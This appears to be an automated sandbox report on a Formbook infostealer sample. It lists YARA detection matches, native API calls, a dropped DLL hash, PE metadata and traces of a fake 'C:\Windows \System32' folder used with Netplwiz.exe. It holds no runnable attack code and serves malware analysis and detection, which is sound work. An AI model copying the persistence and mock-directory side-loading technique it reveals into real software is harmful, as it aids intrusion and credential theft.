        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004181B0 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00418260 NtReadFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004182E0 NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041816A NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004181AA NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00418203 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004182DE NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041838C NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD98A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD98F0 NtReadVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9840 NtDelayExecution,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ADB040 NtSuspendThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD99A0 NtCreateSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD99D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9910 NtAdjustPrivilegesToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9A20 NtResumeThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9A00 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9A10 NtQuerySection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9A50 NtCreateFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ADA3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD95F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD95D0 NtClose,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ADAD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9560 NtWriteFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9540 NtReadFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD96D0 NtCreateKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD97A0 NtUnmapViewOfSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9780 NtMapViewOfSection,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9FE0 NtCreateMutant,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9710 NtQueryInformationToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ADA710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9760 NtOpenProcess,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ADA770 NtOpenThread,
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows \System32Jump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B846
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00401030
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041CA60
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00408C4B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00408C50
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B4A3
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00402D90
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041CEBD
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00402FB0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B620A8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB090
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B628EC
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B6E824
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA830
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A96800
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51002
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9F900
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B622AE
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B632A9
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5E2C5
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4FA2B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACEBB0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABEB9A
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AE8BE8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5DBD2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B503DA
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACABD8
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B62B28
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5231B
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABAB40
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3CB4F
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA841F
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5D466
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC65A0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2581
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAD5E0
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B625DD
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A90D20
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B62D07
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B61D55
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B41EB6
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B62EF7
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB6E30
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5D616
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB5600
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B61FF1
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B567E2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B6DFCE
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_00007FF61AD32D20
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFA35A81678
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFA35A843DC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFA35A81700
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFA35B57962
        Source: Joe Sandbox ViewDropped File: C:\Users\Public\NETUTILS.dll 36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: String function: 02208190 appears 45 times
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: String function: 0220A097 appears 42 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: String function: 00B25720 appears 38 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: String function: 00AED08C appears 39 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: String function: 0041A0A0 appears 31 times
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: String function: 00A9B150 appears 154 times
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeStatic PE information: invalid certificate
        Source: NETUTILS.dll.6.drStatic PE information: Number of sections : 19 > 10
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Citvon.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Netplwiz.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeSection loaded: nviewlib.dll
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: nviewlib.dll
        Source: C:\Users\Public\Citvon\Citvon.exeSection loaded: nviewlib.dll
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776445202.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680695317.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.777072659.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793842362.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792672644.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775505378.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776207302.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
